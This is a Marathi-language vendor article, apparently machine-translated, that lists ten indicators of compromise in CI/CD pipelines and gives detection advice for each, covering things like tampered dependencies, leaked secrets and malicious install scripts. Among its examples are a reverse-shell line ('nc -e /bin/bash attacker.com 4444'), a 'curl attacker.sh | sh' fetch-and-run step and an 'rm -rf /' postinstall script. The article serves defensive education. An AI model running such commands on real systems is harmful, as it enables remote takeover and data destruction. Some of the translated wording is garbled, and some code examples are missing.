तडजोडीचे शीर्ष १० निर्देशक CI/CD Pipelines

अनुक्रमणिका

अवश्य वाचा

नवीनतम मनोरंजक पोस्ट्स

प्रस्तावना: सायबरसुरक्षेतील तडजोडीचे निर्देशक काय आहेत?

तडजोडीचे निर्देशक हे पहिले चेतावणीचे संकेत आहेत की तुमची प्रणाली किंवा pipeline हल्ला होण्याची शक्यता आहे. सोप्या शब्दांत सांगायचे तर, तडजोडीचे संकेतक हल्लेखोरांनी मागे सोडलेले पुरावे, जसे की विचित्र loginफाइल्समधील बदल, किंवा छुपे मालवेअर. आयओसी सायबरसुरक्षाते एखाद्या गुन्हेगारीच्या घटनास्थळी सापडलेल्या बोटांच्या ठशांप्रमाणे काम करतात, ज्यामुळे काहीतरी चुकीचे घडले आहे याचा स्पष्ट पुरावा मिळतो. म्हणून, जेव्हा डेव्हलपर्स विचारतात तडजोडीची चिन्हे कोणती आहेत?याचे उत्तर केवळ सर्व्हर किंवा फायरवॉलपुरते मर्यादित नाही, तर त्यात आधुनिक प्रणालींमध्ये लपलेल्या धोक्यांचाही समावेश आहे. CI/CD pipelines.

यात pipelineत्यामुळे, हल्लेखोर कोणाच्याही लक्षात न येता कोडमध्ये फेरफार करू शकतात, घातक डिपेंडन्सी टाकू शकतात किंवा बिल्ड स्टेप्स बदलू शकतात. तथापि, बहुतेक मार्गदर्शक अजूनही फक्त सर्व्हर किंवा नेटवर्कवरच लक्ष केंद्रित करतात. परिणामी, सॉफ्टवेअर सप्लाय चेन हे सर्वात सोप्या लक्ष्यांपैकी एक बनले आहे.

म्हणूनच तडजोडीचे संकेत शोधणे CI/CD pipelineहे अत्यावश्यक आहे. सर्वात महत्त्वाचे म्हणजे, हे टीम्सना मालवेअर ब्लॉक करण्यास, गोपनीय माहितीचे संरक्षण करण्यास आणि सॉफ्टवेअर वितरणाचा प्रत्येक टप्पा सुरक्षित करण्यास मदत करते.

तडजोडीचे शीर्ष १० निर्देशक CI/CD Pipelines

जेव्हा तडजोडीच्या निर्देशकांचे स्पष्टीकरण दिले जाते, तेव्हा बहुतेक याद्या सर्व्हर किंवा नेटवर्कवर लक्ष केंद्रित करतात. तरीही CI/CD pipelineहल्लेखोर खूप वेगवेगळे ठसे मागे सोडतात. सक्रिय संरक्षणासाठी हे संकेत ओळखणे महत्त्वाचे आहे. खाली आयओसीचे (IOC) १० सायबरसुरक्षा धोक्याचे इशारे दिले आहेत, ज्याकडे प्रत्येक डेव्हलपर आणि सुरक्षा इंजिनिअरने लक्ष दिले पाहिजे.

१. संशयास्पद अवलंबित्व बदल

तडजोडीच्या मुख्य निर्देशकांपैकी एक pipelineहे एक अचानक आणि विचित्र डिपेंडन्सी अपडेट आहे. हल्लेखोर अनेकदा धोकादायक पॅकेजेस समाविष्ट करण्यासाठी, डेव्हलपर्सनी पॅकेज मॅनेजर्सवर ठेवलेल्या विश्वासाचा गैरफायदा घेतात.

उदाहरणार्थ, npm मध्ये package.json diff मध्ये अचानक खालील गोष्टींचा समावेश असू शकतो:

असे बदल सुरक्षित वाटू शकतात, परंतु ते प्रत्येक बिल्डमध्ये ट्रोजनयुक्त कोड टाकू शकतात.

प्रभाव: हॅक झालेल्या बिल्ड्समध्ये मूळ स्रोतामधूनच मालवेअर येतो.

शोध: डिपेंडेंसी रिव्ह्यूची अंमलबजावणी करा, लॉकफाइलमधील बदलांचा मागोवा घ्या आणि नवीन पॅकेजेस सतत स्कॅन करा.

२. बिल्ड्समधील अस्पष्ट कोड 

मालवेअर निर्माते पुनरावलोकनांना चकमा देण्यासाठी अस्पष्टीकरणावर अवलंबून असतात. परिणामी, तडजोडीचा हा निर्देशक... CI/CD pipelineअशा गोष्टी पकडणे सर्वात कठीण असू शकते. खरे तर, अस्पष्ट केलेले पेलोड्स अनेकदा कोणाच्याही लक्षात न येता ओपन सोर्स लायब्ररी किंवा कंटेनर इमेजेसमध्ये शिरतात.

उदाहरणार्थ:

  • PyPI पॅकेज वापरून base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • अनावश्यक UPX बायनरींनी भरलेली डॉकर इमेज.
  • जावास्क्रिप्टने भरलेले \x41\x42 क्रेडेन्शियल चोरांना लपवून ठेवण्यापासून सुटतो.

प्रभाव: हिडन कोड बिल्ड किंवा रनटाइम दरम्यान कोणतीही सूचना न देता कार्यान्वित होतो, ज्यामुळे आयओसी सायबरसुरक्षेमध्ये हा एक गंभीर संकेत ठरतो.
शोध: एकत्र SAST एनकोड केलेला किंवा पॅक केलेला कोड ओळखण्यासाठी मालवेअर स्कॅनिंगचा वापर केला जातो. सर्वात महत्त्वाचे म्हणजे, ऑबफस्केशनला एक धोक्याची सूचना माना, ज्याची अधिक चौकशी करणे आवश्यक आहे.

३. गिटमधील गुपिते उघड: आयओसीचा एक ठळक सायबरसुरक्षा धोका

CI/CD pipelineअनेकदा रिपॉझिटरीजमधून थेट सिक्रेट्स मिळवले जातात. तथापि, जेव्हा गिटमध्ये रहस्ये दिसतातत्यामुळे, “तडजोडीची निर्देशक चिन्हे कोणती आहेत?” या प्रश्नाचे ते सर्वात स्पष्ट उत्तरांपैकी एक बनतात. pipelineएकदा क्रेडेन्शियल्स गिटमध्ये आली की, हल्लेखोर त्यांचा अमर्यादपणे गैरवापर करू शकतात.

उदाहरणार्थ:

  • A .env असलेली फाइल AWS_SECRET_KEY=.
  • टोकन टाकले config.json.
  • काढून टाकल्यानंतरही सिक्रेट्स गिट हिस्ट्रीमध्ये दिसतात.

प्रभाव: उघड झालेल्या कीज हल्लेखोरांना थेट प्रवेश देतात CI/CD pipelineक्लाउड सिस्टीम किंवा डेटाबेस. त्यामुळे हे तडजोडीच्या सर्वात धोकादायक निर्देशकांपैकी एक आहे.
शोध: वापर pre-commit hooks आणि गुप्त स्कॅनिंगसाठी सीआय (CI) जॉब्स चालवा, आणि लीक झालेल्या की तात्काळ रद्द करा. याव्यतिरिक्त, धोक्याचा कालावधी कमी करण्यासाठी स्वयंचलित उपाययोजना लागू करा.

४. छेडछाड केली Pipeline संरचना: तडजोडीचे छुपे निर्देशक

Pipeline कॉन्फिग्स हे उच्च-मूल्याचे लक्ष्य आहेत कारण एकाच बदलामुळे अनेकदा संपूर्ण कार्यप्रवाहात अडथळा येतो.परिणामी, छेडछाड केली pipeline फाईल्स हा आयओसीसाठी एक मोठा सायबरसुरक्षा धोका आहे, जो पारंपारिक देखरेख साधनांद्वारे क्वचितच ओळखला जातो.

उदाहरणार्थ:

  • गिटहब अॅक्शन्समध्ये:

  • GitLab मध्ये: एक दुर्भावनापूर्ण जॉब जोडण्यात आला. .gitlab-ci.yml जो संवेदनशील डेटा टाकतो.
  • जेन्किन्समध्ये: sh "nc -e /bin/bash attacker.com 4444".

प्रभाव: हे अमान्य बदल तुमचे pipeline आक्रमणकर्त्यांसाठी एका कायमस्वरूपी बॅकडोअरमध्ये रूपांतरित होणे, जे स्पष्टपणे तडजोड झाल्याचे लक्षण मानले जाते.
शोध: स्वाक्षरी केलेले कॉन्फिग्स लागू करा, पीआर मंजुरी आवश्यक करा आणि अनपेक्षित जॉब्सवर लक्ष ठेवा. याव्यतिरिक्त, सेट करा guardrails जे बदललेल्या कार्यप्रवाहांना आपोआप अवरोधित करतात.

४. विशेषाधिकारप्राप्त IaC डीफॉल्ट 

चुकीच्या पद्धतीने कॉन्फिगर केलेल्या इन्फ्रास्ट्रक्चर डेफिनिशन्समुळे अनेकदा छुपे बॅकडोअर्स तयार होतात. परिणामी, विशेषाधिकार असलेले डिफॉल्ट्स... IaC हे आयओसीचे एक ठळक सायबरसुरक्षा धोके आहेत.

उदाहरणार्थ:

  • पॉड्स प्रदान करणारे कुबरनेटीस डिप्लॉयमेंट privileged: true.
  • सेवा उघड करणारे हेल्म चार्ट 0.0.0.0:22.

प्रभाव: हल्लेखोर रूट-लेव्हल ॲक्सेस मिळवतात किंवा अंतर्गत सेवा सार्वजनिकपणे उघड करतात. परिणामी, या समस्यांमुळे हल्ल्याची शक्यता लक्षणीयरीत्या वाढते.
शोध: लागू करा IaC मर्ज करण्यापूर्वी किमान विशेषाधिकार लागू करण्यासाठी स्कॅनिंग केले जात आहे. याव्यतिरिक्त, प्रत्येक कॉन्फिगरेशनचे पुनरावलोकन केले जाईल याची खात्री करा. pipeline.

६. असामान्य बिल्ड वर्तन 

हल्लेखोर अनेकदा बदल करतात pipeline दुर्भावनापूर्ण कारवाया करण्यासाठी केले जाणारे वर्तन. दुसऱ्या शब्दांत सांगायचे झाल्यास, तडजोडीचे निर्देशक काय आहेत या प्रश्नाचे सर्वात स्पष्ट उत्तरांपैकी एक म्हणजे असामान्य बिल्ड क्रियाकलाप. CI/CD pipelines.

उदाहरणार्थ:

  • अनोळखी डोमेनवर आउटबाउंड नेटवर्क विनंत्या पाठवणारे बिल्ड्स.
  • Node.js प्रोजेक्टमध्ये अचानक PowerShell सुरू होणे npm install.
  • बिल्ड स्क्रिप्टमध्ये परिभाषित नसलेल्या मोठ्या बायनरी फाइल्स डाउनलोड करणारा CI जॉब.

प्रभाव: असुरक्षित बिल्ड्स मालवेअर वितरणाचे केंद्र म्हणून काम करू शकतात. सर्वात महत्त्वाचे म्हणजे, ते प्रत्येक डिप्लॉयमेंटवर घातक पेलोड्स पसरवतात.
शोध: अनपेक्षित प्रक्रिया किंवा कनेक्शन्ससाठी बिल्ड लॉग्सचे निरीक्षण करा. याव्यतिरिक्त, सामान्य नसलेल्या वर्तनांना चिन्हांकित करण्यासाठी विसंगती शोध कॉन्फिगर करा.

७. आयओसी सायबरसुरक्षा धोके म्हणून दुर्भावनापूर्ण पॅकेज स्क्रिप्ट्स

पॅकेज मॅनेजर जीवनचक्राला समर्थन देतात hooks ज्याचा हल्लेखोर गैरफायदा घेतात. त्यामुळे, npm, PyPI, किंवा Dockerfiles मधील दुर्भावनापूर्ण स्क्रिप्ट्स हे तडजोड झाल्याचे प्रबळ संकेत आहेत.

उदाहरणार्थ:

  • npm: postinstall स्क्रिप्ट चालू आहे rm -rf / किंवा C2 ला बीकनिंग करणे.
  • पायपीआय: setup.py इन्स्टॉल करताना लपवलेला पायथन कोड कार्यान्वित करणे.
  • डॉकरफाइल: RUN curl attacker.sh | sh.

प्रभाव: हा हल्ला इन्स्टॉलेशनच्या वेळी, कोणत्याही रनटाइम चाचणीपूर्वी कार्यान्वित होतो. परिणामी, खूप उशीर होईपर्यंत डेव्हलपर्सच्या हे लक्षातही येत नाही.
शोध: इन्स्टॉल स्क्रिप्ट्ससाठी पॅकेज मॅनिफेस्ट स्कॅन करा. याव्यतिरिक्त, धोकादायक गोष्टींवर निर्बंध घाला. hooks in CI/CD धोका कमी करण्यासाठी नोकऱ्या.

८. नोंदणी विषबाधा तडजोडीचे निर्देशक

हल्लेखोर रजिस्ट्रीमधील आर्टिफॅक्ट्स बदलतात किंवा सुधारित करतात, आणि या घटना पुरवठा साखळीतील तडजोडीच्या निर्देशकांची उत्तम उदाहरणे आहेत. pipelines.

उदाहरणार्थ:

  • ट्रोजनयुक्त थराने गुपचूप अपडेट केलेला डॉकर इमेज टॅग.
  • एका अंतर्गत पॅकेजच्या जागी त्याची सदोष आवृत्ती ठेवण्यात आली.
  • npm नेमस्पेस स्क्वॉटिंग, जसे की lodash-proxy.

प्रभाव: रजिस्ट्री आर्टिफॅक्ट वापरणारी प्रत्येक बिल्ड धोक्यात येते. इतकेच नाही, तर हा धोका डाउनस्ट्रीम सेवांपर्यंत पसरतो.
शोध: सर्व रजिस्ट्री पुलवर स्वाक्षरी आणि अखंडता तपासणी लागू करा. याव्यतिरिक्त, आर्टिफॅक्टच्या उगमाचा मागोवा घ्या. SBOM प्रमाणीकरण

९. आयओसी पुरावा म्हणून असामान्य वापरकर्ता क्रियाकलाप

हॅक झालेल्या खात्यांमागे जवळजवळ नेहमीच असामान्य खुणा राहतात. त्यानुसार, डेव्हलपरचे असामान्य वर्तन हे तडजोड झाल्याचे एक पक्के लक्षण आहे.

उदाहरणार्थ:

  • Commitस्थानिक वेळेनुसार पहाटे ३ वाजता ढकलले.
  • सुट्टीवर असलेल्या खात्यांकडून जनसंपर्क मंजुरी.
  • Pipelineअसामान्य वारंवारतेने ट्रिगर होते.

प्रभाव: हल्लेखोर दुर्भावनापूर्ण बदल करण्यासाठी चोरलेल्या क्रेडेन्शियल्सचा गैरवापर करतात. अखेर, अनधिकृत commitते सामान्य कार्यप्रवाहांमध्ये सहजपणे मिसळून जातात.
शोध: मॉनिटर SCM विसंगतींसाठी सक्रियता तपासा, MFA लागू करा आणि टोकन्स नियमितपणे बदला. याव्यतिरिक्त, संशयास्पद हालचालींवर अलर्ट द्या. commit किंवा मंजुरीचे नमुने.

१०. आयओसी सायबरसुरक्षेमध्ये अखंडता किंवा स्वाक्षरी तपासणी अयशस्वी होणे

एक सामान्य पण दुर्लक्षित तडजोडीचा निर्देशक ही एक अखंडता किंवा स्वाक्षरी तपासणी अयशस्वी आहे. आयओसी सायबरसुरक्षेमध्ये, या तपासण्या कोड किंवा आर्टिफॅक्ट्स अस्सल असल्याची पडताळणी करतात. त्या वगळल्यास... pipelineउघडकीस आले आहे.

उदाहरणे:

  • अपेक्षित चेकसमशी जुळत नसलेला SHA256 हॅश.
  • गहाळ किंवा अवैध GPG स्वाक्षरी.
  • An SBOM स्वाक्षरी नसलेले आर्टिफॅक्ट्स दाखवत आहे.

प्रभाव: अखंडतेतील त्रुटींचा अर्थ अनेकदा छेडछाड, रजिस्ट्रीमध्ये फेरफार किंवा मालवेअरचा शिरकाव असा होतो.

शोध: स्वाक्षरी तपासणी स्वयंचलित करा, चेकसम प्रमाणीकरण लागू करा आणि स्वाक्षरी नसलेले घटक अवरोधित करा. सर्वात महत्त्वाचे म्हणजे, प्रत्येक अयशस्वी तपासणीला तडजोडीचा स्पष्ट पुरावा माना.

CI/CD तडजोडीचे निर्देशक एका दृष्टिक्षेपात

तडजोडीचा सूचक (IOC) मध्ये प्रभाव CI/CD Pipelines कसे शोधायचे
संशयास्पद अवलंबित्व बदल हल्लेखोर पॅकेज मॅनेजरमध्ये दुर्भावनापूर्ण लायब्ररी टाकतात, ज्यामुळे बिल्डमध्ये बिघाड होतो. लॉकफाईलमधील बदलांचा मागोवा घ्या, डिपेंडन्सी रिव्ह्यूची अंमलबजावणी करा आणि डिपेंडन्सी सतत स्कॅन करा.
बिल्ड्समधील अस्पष्ट कोड छुपे पेलोड्स बिल्ड किंवा रनटाइम दरम्यान कोणाच्याही लक्षात न येता कार्यान्वित होतात. वापर SAST आणि बेस64, हेक्स किंवा पॅक्ड कोड पॅटर्न ओळखण्यासाठी मालवेअर स्कॅनिंग.
गिटमधील रहस्ये उघडकीस लीक झालेले टोकन किंवा एपीआय की हल्लेखोरांना महत्त्वाच्या प्रणालींमध्ये थेट प्रवेश मिळवून देतात. गिटमध्ये गुप्त स्कॅन चालवा hooks आणि लीक झालेली क्रेडेन्शियल्स आपोआप रद्द करा.
छेडछाड केली Pipeline कॉन्फिगरेशन सुधारित कार्यप्रवाह डेटा बाहेर काढण्यास किंवा आतमध्ये टिकवून ठेवण्यास परवानगी देतात. CI/CD. पीआर मंजुरी आवश्यक करा, स्वाक्षरी केलेले कॉन्फिग्स लागू करा आणि देखरेख करा. pipeline बदल
विशेषाधिकार IaC डीफॉल्ट अत्यधिक शिथिल भूमिका किंवा असुरक्षित डीफॉल्ट्समुळे क्लाउड वातावरण असुरक्षित होते. किमान विशेषाधिकार अंमलबजावणीसाठी टेराफॉर्म, कुबरनेट्स आणि हेल्म फाइल्स स्कॅन करा.
असामान्य बिल्ड वर्तन Pipelineमालवेअर वितरण केंद्र म्हणून किंवा लॅटरल मूव्हमेंटसाठी वापरले जातात. अनपेक्षित डाउनलोड, प्रक्रिया किंवा आउटबाउंड कॉल्ससाठी बिल्ड लॉगचे विश्लेषण करा.
दुर्भावनापूर्ण पॅकेज स्क्रिप्ट्स लपवलेल्या प्री/पोस्ट-इन्स्टॉल स्क्रिप्ट्स रनटाइम चाचणीपूर्वी पेलोड्स कार्यान्वित करतात. धोकादायक npm/PyPI स्क्रिप्ट्स ब्लॉक करा आणि अंमलबजावणीवर निर्बंध घाला CI/CD नोकर्या
नोंदणी विषबाधा ट्रोजनयुक्त आर्टिफॅक्ट्स रजिस्ट्रीमधील विश्वसनीय इमेजेस किंवा बायनरींची जागा घेतात. चेकसमची पडताळणी करा, स्वाक्षरी प्रमाणीकरण लागू करा आणि सक्रियपणे रजिस्ट्री स्कॅन करा.
असामान्य वापरकर्ता क्रियाकलाप हॅक झालेल्या खात्यांद्वारे दुर्भावनापूर्ण संदेश पाठवले जातात. commitएस किंवा ट्रिगर pipelines. एमएफए लागू करा, देखरेख करा commitविसंगतींसाठी, आणि विश्लेषण करा login नमुने
अखंडता किंवा स्वाक्षरी तपासणी अयशस्वी झाली छेडछाड केलेला कोड, डिपेंडेंसी किंवा इमेजेस प्रवेश करत असल्याचे सूचित करते pipeline. अखंडता तपासणी स्वयंचलित करा आणि स्वाक्षरी नसलेले किंवा जुळत नसलेले घटक अवरोधित करा.

पारंपारिक आयओसी सायबरसुरक्षा का चुकते CI/CD धोके

बहुतेक संस्था आधीपासूनच सर्व्हर, संगणक किंवा नेटवर्कवरील धोक्याच्या निर्देशकांवर लक्ष ठेवतात. तथापि, आयओसी सायबरसुरक्षेचा हा पारंपरिक दृष्टिकोन याकडे दुर्लक्ष करतो की... CI/CD pipelineजे आता सर्वात गंभीर हल्ला होण्याच्या जागांपैकी एक आहेत. खरं तर, pipelineते असे अनोखे तडजोडीचे संकेत दर्शवतात जे पारंपारिक साधनांना ओळखता येत नाहीत.

पारंपारिक सुरक्षेतील तडजोडीचे निर्देशक

पारंपारिक आयओसी सायबरसुरक्षेमध्ये, सामान्यतः खालील बाबींवर लक्ष केंद्रित केले जाते:

  • असामान्य loginचोरी केलेली क्रेडेन्शियल्स सुचवणारे ईमेल किंवा आयपी ॲड्रेस.
  • मालवेअर उघडकीस आणणारे संशयास्पद फाईल हॅश किंवा रजिस्ट्रीमधील बदल.
  • डेटा बाहेर जाण्याकडे निर्देश करणारी अनपेक्षित बाह्य रहदारी.

हे सुप्रसिद्ध निर्देशक आहेत ज्यांचा मागोवा देखील घेतला जातो मिटर एटीटी आणि सीके फ्रेमवर्कजे सामान्य शत्रूंच्या वर्तणुकीचे आणि डावपेचांचे चित्रण करते. हे उपयुक्त संकेत आहेत. तथापि, ते प्रामुख्याने ऑपरेटिंग सिस्टीम किंवा कॉर्पोरेट नेटवर्क्सना लागू होतात. परिणामी, सॉफ्टवेअर पुरवठा साखळीत सुरुवातीच्या टप्प्यात होणारी सूक्ष्म छेडछाड त्यांच्या लक्षात येत नाही.

का CI/CD Pipelineवेगळे आहेत

CI/CD pipelineही स्वयंचलित वातावरणं आहेत जिथे विकसक commit कोड, पुल डिपेंडेंसीज आणि रिलीज बिल्ड्स. हल्लेखोरांना माहित आहे की येथे एकदा झालेली तडजोड प्रत्येक डिप्लॉयमेंटमध्ये पसरते. त्यानुसार, तडजोडीचे निर्देशक काय आहेत? CI/CD pipelineते खूप वेगळे दिसतात:

  • package.json किंवा requirements.txt मध्ये नकळतपणे जोडलेले एक दुर्भावनापूर्ण डिपेंडन्सी.
  • गिटमध्ये उघड केलेले एपीआय की किंवा टोकन commits किंवा .env फाईल्स.
  • npm किंवा PyPI पॅकेजेसमध्ये इंजेक्ट केलेला अस्पष्ट कोड.
  • privileged: true सारख्या असुरक्षित डीफॉल्टसह असलेल्या Terraform किंवा Kubernetes फाइल्स.
  • Pipeline डेटा बाहेर काढण्यासाठी किंवा बॅकडोअर उघडण्यासाठी जॉब्समध्ये बदल करण्यात आले.

हे तडजोडीचे संकेत CI/CD अदृश्य राहणे standard सुरक्षा साधने.

आयओसी सायबरसुरक्षेतील त्रुटी

जरी अनेक संघांना धोक्याच्या सूचकांचे महत्त्व कळत असले तरी, ते अजूनही केवळ सर्व्हर आणि नेटवर्क लॉगमधील शोधावरच अवलंबून राहतात. त्यामुळे, हल्लेखोर नेहमीचे पुरावे न सोडता बिल्ड्समध्ये दोष निर्माण करू शकतात किंवा मालवेअर टाकू शकतात. यामुळेच XZ Utils बॅकडोअर किंवा दुर्भावनापूर्ण npm पॅकेजेससारख्या घटना प्रोडक्शनमध्ये पोहोचेपर्यंत लक्षात आल्या नाहीत.

पुरवठा साखळीतील या प्रकारच्या तडजोडी यांमुळे देखील अधोरेखित होतात CIS'अ' चे पुरवठा साखळी सुरक्षा मार्गदर्शनजे असा इशारा देते की हल्लेखोर वाढत्या प्रमाणात लक्ष्य करतात CI/CD pipelines आणि नोंदणी.

टेकवे

पारंपारिक आयओसी सायबरसुरक्षा आवश्यक आहे, पण ती पुरेशी नाही. सर्वात महत्त्वाचे म्हणजे, टीम्सनी विशिष्ट तडजोडीचे निर्देशक ओळखले पाहिजेत. CI/CD pipelineतरच ते दुर्भावनापूर्ण कोड किंवा pipeline वातावरणात पसरण्यापूर्वीच त्याचा गैरवापर करा.

sca-tools-software-composition-analysis-tools
तुमच्या सॉफ्टवेअरमधील धोक्यांना प्राधान्य द्या, त्यांचे निवारण करा आणि त्यांना सुरक्षित करा.
आपले मोफत खाते मिळवा.
क्रेडिट कार्ड आवश्यक नाही.

तुमचा सॉफ्टवेअर विकास आणि वितरण सुरक्षित करा

झायगेनी प्रोडक्ट सूटसह